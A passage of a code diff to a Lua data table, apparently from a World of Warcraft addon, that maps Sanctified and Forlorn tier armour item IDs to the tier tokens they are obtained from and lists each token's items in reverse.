Sanctification + }, + -- Sanctified Frost Witch's Kilt + ["51203"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Shoulderpads + ["51204"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Dark Coven Shoulderpads + ["51205"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Dark Coven Robe + ["51206"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Dark Coven Leggings + ["51207"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Dark Coven Hood + ["51208"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Dark Coven Gloves + ["51209"] = { + 52027, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Shoulderplates + ["51210"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Legplates + ["51211"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Helmet + ["51212"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Gauntlets + ["51213"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Battleplate + ["51214"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Pauldrons + ["51215"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Legguards + ["51216"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Handguards + ["51217"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Greathelm + ["51218"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Breastplate + ["51219"] = { + 52026, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Breastplate + ["51220"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Greathelm + ["51221"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Handguards + ["51222"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Legguards + ["51223"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Pauldrons + ["51224"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Battleplate + ["51225"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Gauntlets + ["51226"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Helmet + ["51227"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Legplates + ["51228"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ymirjar Lord's Shoulderplates + ["51229"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Dark Coven Gloves + ["51230"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Dark Coven Hood + ["51231"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Dark Coven Leggings + ["51232"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Dark Coven Robe + ["51233"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Dark Coven Shoulderpads + ["51234"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Frost Witch's Shoulderpads + ["51235"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Kilt + ["51236"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Helm + ["51237"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Gloves + ["51238"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Hauberk + ["51239"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Shoulderguards + ["51240"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's War-Kilt + ["51241"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Faceguard + ["51242"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Grips + ["51243"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Chestguard + ["51244"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Spaulders + ["51245"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Legguards + ["51246"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Headpiece + ["51247"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Handguards + ["51248"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Frost Witch's Tunic + ["51249"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Shadowblade Breastplate + ["51250"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Shadowblade Gauntlets + ["51251"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Shadowblade Helmet + ["51252"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Shadowblade Legplates + ["51253"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Shadowblade Pauldrons + ["51254"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Cowl + ["51255"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Handwraps + ["51256"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Mantle + ["51257"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Pants + ["51258"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Raiments + ["51259"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Gloves + ["51260"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Hood + ["51261"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Leggings + ["51262"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Robe + ["51263"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Crimson Acolyte Shoulderpads + ["51264"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Chestguard + ["51265"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Faceguard + ["51266"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Handguards + ["51267"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Legguards + ["51268"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Shoulderguards + ["51269"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Gloves + ["51270"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Greaves + ["51271"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Headpiece + ["51272"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Spaulders + ["51273"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Tunic + ["51274"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Battleplate + ["51275"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Gauntlets + ["51276"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Helmet + ["51277"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Legplates + ["51278"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Lightsworn Shoulderplates + ["51279"] = { + 52030, -- Conqueror's Mark of Sanctification + }, + -- Sanctified Bloodmage Gloves + ["51280"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Bloodmage Hood + ["51281"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Bloodmage Leggings + ["51282"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Bloodmage Robe + ["51283"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Bloodmage Shoulderpads + ["51284"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Handguards + ["51285"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Headpiece + ["51286"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Legguards + ["51287"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Spaulders + ["51288"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Ahn'Kahar Blood Hunter's Tunic + ["51289"] = { + 52029, -- Protector's Mark of Sanctification + }, + -- Sanctified Lasherweave Cover + ["51290"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Gloves + ["51291"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Mantle + ["51292"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Trousers + ["51293"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Vestment + ["51294"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Handgrips + ["51295"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Headguard + ["51296"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Legguards + ["51297"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Raiment + ["51298"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Shoulderpads + ["51299"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Robes + ["51300"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Gauntlets + ["51301"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Helmet + ["51302"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Legplates + ["51303"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Lasherweave Pauldrons + ["51304"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Chestguard + ["51305"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Faceguard + ["51306"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Handguards + ["51307"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Legguards + ["51308"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Pauldrons + ["51309"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Battleplate + ["51310"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Gauntlets + ["51311"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Helmet + ["51312"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Legplates + ["51313"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Sanctified Scourgelord Shoulderplates + ["51314"] = { + 52028, -- Vanquisher's Mark of Sanctification + }, + -- Vanquisher's Mark of Sanctification + ["52025"] = { + 51125, -- Sanctified Scourgelord Shoulderplates + 51126, -- Sanctified Scourgelord Legplates + 51127, -- Sanctified Scourgelord Helmet + 51128, -- Sanctified Scourgelord Gauntlets + 51129, -- Sanctified Scourgelord Battleplate + 51130, -- Sanctified Scourgelord Pauldrons + 51131, -- Sanctified Scourgelord Legguards + 51132, -- Sanctified Scourgelord Handguards + 51133, -- Sanctified Scourgelord Faceguard + 51134, -- Sanctified Scourgelord Chestguard + 51135, -- Sanctified Lasherweave Pauldrons + 51136, -- Sanctified Lasherweave Legplates + 51137, -- Sanctified Lasherweave Helmet + 51138, -- Sanctified Lasherweave Gauntlets + 51139, -- Sanctified Lasherweave Robes + 51140, -- Sanctified Lasherweave Shoulderpads + 51141, -- Sanctified Lasherweave Raiment + 51142, -- Sanctified Lasherweave Legguards + 51143, -- Sanctified Lasherweave Headguard + 51144, -- Sanctified Lasherweave Handgrips + 51145, -- Sanctified Lasherweave Vestment + 51146, -- Sanctified Lasherweave Trousers + 51147, -- Sanctified Lasherweave Mantle + 51148, -- Sanctified Lasherweave Gloves + 51149, -- Sanctified Lasherweave Cover + 51155, -- Sanctified Bloodmage Shoulderpads + 51156, -- Sanctified Bloodmage Robe + 51157, -- Sanctified Bloodmage Leggings + 51158, -- Sanctified Bloodmage Hood + 51159, -- Sanctified Bloodmage Gloves + 51185, -- Sanctified Shadowblade Pauldrons + 51186, -- Sanctified Shadowblade Legplates + 51187, -- Sanctified Shadowblade Helmet + 51188, -- Sanctified Shadowblade Gauntlets + 51189, -- Sanctified Shadowblade Breastplate + }, + -- Protector's Mark of Sanctification + ["52026"] = { + 51150, -- Sanctified Ahn'Kahar Blood Hunter's Tunic + 51151, -- Sanctified Ahn'Kahar Blood Hunter's Spaulders + 51152, -- Sanctified Ahn'Kahar Blood Hunter's Legguards + 51153, -- Sanctified Ahn'Kahar Blood Hunter's Headpiece + 51154, -- Sanctified Ahn'Kahar Blood Hunter's Handguards + 51190, -- Sanctified Frost Witch's Tunic + 51191, -- Sanctified Frost Witch's Handguards + 51192, -- Sanctified Frost Witch's Headpiece + 51193, -- Sanctified Frost Witch's Legguards + 51194, -- Sanctified Frost Witch's Spaulders + 51195, -- Sanctified Frost Witch's Chestguard + 51196, -- Sanctified Frost Witch's Grips + 51197, -- Sanctified Frost Witch's Faceguard + 51198, -- Sanctified Frost Witch's War-Kilt + 51199, -- Sanctified Frost Witch's Shoulderguards + 51200, -- Sanctified Frost Witch's Hauberk + 51201, -- Sanctified Frost Witch's Gloves + 51202, -- Sanctified Frost Witch's Helm + 51203, -- Sanctified Frost Witch's Kilt + 51204, -- Sanctified Frost Witch's Shoulderpads + 51210, -- Sanctified Ymirjar Lord's Shoulderplates + 51211, -- Sanctified Ymirjar Lord's Legplates + 51212, -- Sanctified Ymirjar Lord's Helmet + 51213, -- Sanctified Ymirjar Lord's Gauntlets + 51214, -- Sanctified Ymirjar Lord's Battleplate + 51215, -- Sanctified Ymirjar Lord's Pauldrons + 51216, -- Sanctified Ymirjar Lord's Legguards + 51217, -- Sanctified Ymirjar Lord's Handguards + 51218, -- Sanctified Ymirjar Lord's Greathelm + 51219, -- Sanctified Ymirjar Lord's Breastplate + }, + -- Conqueror's Mark of Sanctification + ["52027"] = { + 51160, -- Sanctified Lightsworn Shoulderplates + 51161, -- Sanctified Lightsworn Legplates + 51162, -- Sanctified Lightsworn Helmet + 51163, -- Sanctified Lightsworn Gauntlets + 51164, -- Sanctified Lightsworn Battleplate + 51165, -- Sanctified Lightsworn Tunic + 51166, -- Sanctified Lightsworn Spaulders + 51167, -- Sanctified Lightsworn Headpiece + 51168, -- Sanctified Lightsworn Greaves + 51169, -- Sanctified Lightsworn Gloves + 51170, -- Sanctified Lightsworn Shoulderguards + 51171, -- Sanctified Lightsworn Legguards + 51172, -- Sanctified Lightsworn Handguards + 51173, -- Sanctified Lightsworn Faceguard + 51174, -- Sanctified Lightsworn Chestguard + 51175, -- Sanctified Crimson Acolyte Shoulderpads + 51176, -- Sanctified Crimson Acolyte Robe + 51177, -- Sanctified Crimson Acolyte Leggings + 51178, -- Sanctified Crimson Acolyte Hood + 51179, -- Sanctified Crimson Acolyte Gloves + 51180, -- Sanctified Crimson Acolyte Raiments + 51181, -- Sanctified Crimson Acolyte Pants + 51182, -- Sanctified Crimson Acolyte Mantle + 51183, -- Sanctified Crimson Acolyte Handwraps + 51184, -- Sanctified Crimson Acolyte Cowl + 51205, -- Sanctified Dark Coven Shoulderpads + 51206, -- Sanctified Dark Coven Robe + 51207, -- Sanctified Dark Coven Leggings + 51208, -- Sanctified Dark Coven Hood + 51209, -- Sanctified Dark Coven Gloves + }, + -- Vanquisher's Mark of Sanctification + ["52028"] = { + 51250, -- Sanctified Shadowblade Breastplate + 51251, -- Sanctified Shadowblade Gauntlets + 51252, -- Sanctified Shadowblade Helmet + 51253, -- Sanctified Shadowblade Legplates + 51254, -- Sanctified Shadowblade Pauldrons + 51280, -- Sanctified Bloodmage Gloves + 51281, -- Sanctified Bloodmage Hood + 51282, -- Sanctified Bloodmage Leggings + 51283, -- Sanctified Bloodmage Robe + 51284, -- Sanctified Bloodmage Shoulderpads + 51290, -- Sanctified Lasherweave Cover + 51291, -- Sanctified Lasherweave Gloves + 51292, -- Sanctified Lasherweave Mantle + 51293, -- Sanctified Lasherweave Trousers + 51294, -- Sanctified Lasherweave Vestment + 51295, -- Sanctified Lasherweave Handgrips + 51296, -- Sanctified Lasherweave Headguard + 51297, -- Sanctified Lasherweave Legguards + 51298, -- Sanctified Lasherweave Raiment + 51299, -- Sanctified Lasherweave Shoulderpads + 51300, -- Sanctified Lasherweave Robes + 51301, -- Sanctified Lasherweave Gauntlets + 51302, -- Sanctified Lasherweave Helmet + 51303, -- Sanctified Lasherweave Legplates + 51304, -- Sanctified Lasherweave Pauldrons + 51305, -- Sanctified Scourgelord Chestguard + 51306, -- Sanctified Scourgelord Faceguard + 51307, -- Sanctified Scourgelord Handguards + 51308, -- Sanctified Scourgelord Legguards + 51309, -- Sanctified Scourgelord Pauldrons + 51310, -- Sanctified Scourgelord Battleplate + 51311, -- Sanctified Scourgelord Gauntlets + 51312, -- Sanctified Scourgelord Helmet + 51313, -- Sanctified Scourgelord Legplates + 51314, -- Sanctified Scourgelord Shoulderplates + }, + -- Protector's Mark of Sanctification + ["52029"] = { + 51220, -- Sanctified Ymirjar Lord's Breastplate + 51221, -- Sanctified Ymirjar Lord's Greathelm + 51222, -- Sanctified Ymirjar Lord's Handguards + 51223, -- Sanctified Ymirjar Lord's Legguards + 51224, -- Sanctified Ymirjar Lord's Pauldrons + 51225, -- Sanctified Ymirjar Lord's Battleplate + 51226, -- Sanctified Ymirjar Lord's Gauntlets + 51227, -- Sanctified Ymirjar Lord's Helmet + 51228, -- Sanctified Ymirjar Lord's Legplates + 51229, -- Sanctified Ymirjar Lord's Shoulderplates + 51235, -- Sanctified Frost Witch's Shoulderpads + 51236, -- Sanctified Frost Witch's Kilt + 51237, -- Sanctified Frost Witch's Helm + 51238, -- Sanctified Frost Witch's Gloves + 51239, -- Sanctified Frost Witch's Hauberk + 51240, -- Sanctified Frost Witch's Shoulderguards + 51241, -- Sanctified Frost Witch's War-Kilt + 51242, -- Sanctified Frost Witch's Faceguard + 51243, -- Sanctified Frost Witch's Grips + 51244, -- Sanctified Frost Witch's Chestguard + 51245, -- Sanctified Frost Witch's Spaulders + 51246, -- Sanctified Frost Witch's Legguards + 51247, -- Sanctified Frost Witch's Headpiece + 51248, -- Sanctified Frost Witch's Handguards + 51249, -- Sanctified Frost Witch's Tunic + 51285, -- Sanctified Ahn'Kahar Blood Hunter's Handguards + 51286, -- Sanctified Ahn'Kahar Blood Hunter's Headpiece + 51287, -- Sanctified Ahn'Kahar Blood Hunter's Legguards + 51288, -- Sanctified Ahn'Kahar Blood Hunter's Spaulders + 51289, -- Sanctified Ahn'Kahar Blood Hunter's Tunic + }, + -- Conqueror's Mark of Sanctification + ["52030"] = { + 51230, -- Sanctified Dark Coven Gloves + 51231, -- Sanctified Dark Coven Hood + 51232, -- Sanctified Dark Coven Leggings + 51233, -- Sanctified Dark Coven Robe + 51234, -- Sanctified Dark Coven Shoulderpads + 51255, -- Sanctified Crimson Acolyte Cowl + 51256, -- Sanctified Crimson Acolyte Handwraps + 51257, -- Sanctified Crimson Acolyte Mantle + 51258, -- Sanctified Crimson Acolyte Pants + 51259, -- Sanctified Crimson Acolyte Raiments + 51260, -- Sanctified Crimson Acolyte Gloves + 51261, -- Sanctified Crimson Acolyte Hood + 51262, -- Sanctified Crimson Acolyte Leggings + 51263, -- Sanctified Crimson Acolyte Robe + 51264, -- Sanctified Crimson Acolyte Shoulderpads + 51265, -- Sanctified Lightsworn Chestguard + 51266, -- Sanctified Lightsworn Faceguard + 51267, -- Sanctified Lightsworn Handguards + 51268, -- Sanctified Lightsworn Legguards + 51269, -- Sanctified Lightsworn Shoulderguards + 51270, -- Sanctified Lightsworn Gloves + 51271, -- Sanctified Lightsworn Greaves + 51272, -- Sanctified Lightsworn Headpiece + 51273, -- Sanctified Lightsworn Spaulders + 51274, -- Sanctified Lightsworn Tunic + 51275, -- Sanctified Lightsworn Battleplate + 51276, -- Sanctified Lightsworn Gauntlets + 51277, -- Sanctified Lightsworn Helmet + 51278, -- Sanctified Lightsworn Legplates + 51279, -- Sanctified Lightsworn Shoulderplates + }, + -- Firelord's Hood + ["60243"] = { + 63682, -- Helm of the Forlorn Vanquisher + }, + -- Firelord's Mantle + ["60246"] = { + 64314, -- Mantle of the Forlorn Vanquisher + }, + -- Shadowflame Hood + ["60249"] = { + 63683, -- Helm of the Forlorn Conqueror + }, + -- Shadowflame Mantle + ["60252"] = { + 64315, -- Mantle of the Forlorn Conqueror + }, + -- Mercurial Shoulderwraps + ["60253"] = { + 64315, -- Mantle of the Forlorn Conqueror + }, + -- Mercurial Hood + ["60256"] = { + 63683, -- Helm of the Forlorn Conqueror + }, + -- Mercurial Cowl + ["60258"] = { + 63683, -- Helm of the Forlorn Conqueror + }, + -- Mercurial Mantle + ["60262"] = { + 64315, -- Mantle of the Forlorn Conqueror + }, + -- Stormrider's Helm + ["60277"] = { + 63682, -- Helm of the Forlorn Vanquisher + }, + -- Stormrider's Mantle + ["60279"] = { + 64314, -- Mantle of the Forlorn Vanquisher + }, + -- Stormrider's Cover + ["60282"] = { + 63682, -- Helm of the Forlorn Vanquisher + }, + -- Stormrider's Shoulderwraps + ["60284"] = { + 64314, -- Mantle of the Forlorn Vanquisher + }, + -- Stormrider's Headpiece + ["60286"] = { + 63682, -- Helm of the Forlorn Vanquisher + }, + -- Stormrider's Spaulders + ["60289"] = { + 64314, -- Mantle of the Forlorn Vanquisher + }, + -- Wind Dancer's Helmet + ["60299"] = { + 63682, -- Helm of the Forlorn Vanquisher + }, + -- Wind Dancer's Spaulders + ["60302"] = { + 64314, -- Mantle of the Forlorn Vanquisher + }, + -- Lightning-Charged Headguard + ["60303"] = { + 63684, -- Helm of the Forlorn Protector + }, + -- Lightning-Charged Spaulders + ["60306"] = { + 64316, -- Mantle of the Forlorn Protector + }, + -- Faceguard of the Raging Elements + ["60308"] = { + 63684, -- Helm of the Forlorn Protector + }, + -- Mantle of the Raging Elements + ["60311"] = { + 64316, -- Mantle of the Forlorn Protector + }, + -- Headpiece of the Raging Elements + ["60315"] = { + 63684, -- Helm of the Forlorn Protector + }, + -- Shoulderwraps of the Raging Elements + ["60317"] = { + 64316, -- Mantle of the Forlorn Protector + }, + -- Helmet of the Raging Elements + ["60320"] = { + 63684, -- Helm of the Forlorn Protector + }, + -- Spaulders of the Raging Elements + ["60322"] = { + 64316, -- Mantle of the Forlorn Protector + }, + -- Earthen Helmet + ["60325"] = { + 63684, -- Helm of the Forlorn Protector + }, + -- Earthen Pauldrons + ["60327"] = { + 64316, -- Mantle of the Forlorn Protector + }, + -- Earthen Faceguard + ["60328"] = { + 63684, -- Helm of the Forlorn Protector + }, + -- Earthen Shoulderguards + ["60331"] = { + 64316, -- Mantle of the Forlorn Protector + }, + -- Magma Plated Helmet + ["60341"] = { + 63682, -- Helm of the Forlorn Vanquisher + }, + -- Magma Plated Pauldrons + ["60343"] = { + 64314, -- Mantle of the Forlorn Vanquisher + }, + -- Reinforced Sapphirium Helmet + ["60346"] = { + 63683, -- Helm of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Pauldrons + ["60348"] = { + 64315, -- Mantle of the Forlorn Conqueror + }, + -- Magma Plated Faceguard + ["60351"] = { + 63682, -- Helm of the Forlorn Vanquisher + }, + -- Magma Plated Shoulderguards + ["60353"] = { + 64314, -- Mantle of the Forlorn Vanquisher + }, + -- Reinforced Sapphirium Faceguard + ["60356"] = { + 63683, -- Helm of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Shoulderguards + ["60358"] = { + 64315, -- Mantle of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Headguard + ["60359"] = { + 63683, -- Helm of the Forlorn Conqueror + }, + -- Reinforced Sapphirium Mantle + ["60362"] = { + 64315, -- Mantle of the Forlorn Conqueror + }, + -- Helm of the Forlorn Vanquisher + ["63682"] = { + 60243, -- Firelord's Hood + 60277, -- Stormrider's Helm + 60282, -- Stormrider's Cover + 60286, -- Stormrider's Headpiece + 60299, -- Wind Dancer's Helmet + 60341, -- Magma Plated Helmet + 60351, -- Magma Plated Faceguard + }, + -- Helm of the Forlorn Conqueror + ["63683"] = { + 60249, -- Shadowflame Hood + 60256, -- Mercurial Hood + 60258, -- Mercurial Cowl + 60346, -- Reinforced Sapphirium Helmet + 60356, -- Reinforced Sapphirium Faceguard + 60359, -- Reinforced Sapphirium Headguard + }, + -- Helm of the Forlorn Protector + ["63684"] = { + 60303, -- Lightning-Charged Headguard + 60308, -- Faceguard of the Raging Elements + 60315, -- Headpiece of the Raging Elements + 60320, -- Helmet of the Raging Elements + 60325, -- Earthen Helmet + 60328, -- Earthen Faceguard + }, + -- Mantle of the Forlorn Vanquisher + ["64314"] = { + 60246, -- Firelord's Mantle + 60279, -- Stormrider's Mantle + 60284, -- Stormrider's Shoulderwraps + 60289, -- Stormrider's Spaulders + 60302, -- Wind Dancer's Spaulders + 60343, -- Magma Plated Pauldrons + 60353, -- Magma Plated Shoulderguards + }, + -- Mantle of the Forlorn Conqueror + ["64315"] = { + 60252, -- Shadowflame Mantle + 60253, -- Mercurial Shoulderwraps + 60262, -- Mercurial Mantle + 60348, -- Reinforced Sapphirium Pauldrons + 60358, -- Reinforced Sapphirium Shoulderguards + 60362, -- Reinforced Sapphirium Mantle + }, + -- Mantle of the Forlorn Protector + ["64316"] = { + 60306, -- Lightning-Charged Spaulders + 60311, -- Mantle of the Raging Elements + 60317, -- Shoulderwraps of the Raging Elements + 60322, -- Spaulders of the Raging Elements + 60327, -- Earthen Pauldrons + 60331, -- Earthen Shoulderguards + }, + -- Crown of the Forlorn Protector + ["65000"] = { + 65206, -- Lightning-Charged Headguard + 65246, -- Faceguard of the Raging Elements + 65251, -- Helmet of the Raging Elements + 65256, -- Headpiece of the Raging Elements + 65266, -- Earthen Helmet + 65271, -- Earthen Faceguard + }, + -- Crown of the Forlorn Conqueror + ["65001"] = { + 65216, -- Reinforced Sapphirium Helmet + 65221, -- Reinforced Sapphirium Headguard + 65226, -- Reinforced Sapphirium Faceguard + 65230, -- Mercurial Cowl + 65235, -- Mercurial Hood + 65260, -- Shadowflame Hood }, - -- Regalia of the Grand Conqueror - ["47557"] = { - 47788, -- Kel'Thuzad's Gloves of Triumph - 47789, -- Kel'Thuzad's Hood of Triumph - 47790, -- Kel'Thuzad's Leggings of Triumph - 47791, -- Kel'Thuzad's Robe of Triumph - 47792, -- Kel'Thuzad's Shoulderpads of Triumph - 47793, -- Gul'dan's Shoulderpads of Triumph - 47794, -- Gul'dan's Robe of Triumph - 47795, -- Gul'dan's Leggings of Triumph - 47796, -- Gul'dan's Hood of Triumph - 47797, -- Gul'dan's Gloves of Triumph - 48029, -- Velen's Shoulderpads of Triumph - 48031, -- Velen's Robe of Triumph - 48033, -- Velen's Leggings of Triumph - 48035, -- Velen's Cowl of Triumph - 48037, -- Velen's Gloves of Triumph - 48057, -- Zabra's Gloves of Triumph - 48058, -- Zabra's Cowl of Triumph - 48059, -- Zabra's Leggings of Triumph - 48060, -- Zabra's Robe of Triumph - 48061, -- Zabra's Shoulderpads of Triumph - 48082, -- Velen's Mantle of Triumph - 48083, -- Velen's Raiments of Triumph - 48084, -- Velen's Pants of Triumph - 48085, -- Velen's Circlet of Triumph - 48086, -- Velen's Handwraps of Triumph - 48087, -- Zabra's Handwraps of Triumph - 48088, -- Zabra's Circlet of Triumph - 48089, -- Zabra's Pants of Triumph - 48090, -- Zabra's Raiments of Triumph - 48091, -- Zabra's Mantle of Triumph - 48580, -- Turalyon's Spaulders of Triumph - 48581, -- Turalyon's Greaves of Triumph - 48582, -- Turalyon's Headpiece of Triumph - 48583, -- Turalyon's Gloves of Triumph - 48584, -- Turalyon's Tunic of Triumph - 48585, -- Liadrin's Spaulders of Triumph - 48586, -- Liadrin's Greaves of Triumph - 48587, -- Liadrin's Headpiece of Triumph - 48588, -- Liadrin's Gloves of Triumph - 48589, -- Liadrin's Tunic of Triumph - 48612, -- Turalyon's Shoulderplates of Triumph - 48613, -- Turalyon's Legplates of Triumph - 48614, -- Turalyon's Helm of Triumph - 48615, -- Turalyon's Gauntlets of Triumph - 48616, -- Turalyon's Battleplate of Triumph - 48617, -- Liadrin's Battleplate of Triumph - 48618, -- Liadrin's Gauntlets of Triumph - 48619, -- Liadrin's Helm of Triumph - 48620, -- Liadrin's Legplates of Triumph - 48621, -- Liadrin's Shoulderplates of Triumph - 48642, -- Turalyon's Breastplate of Triumph 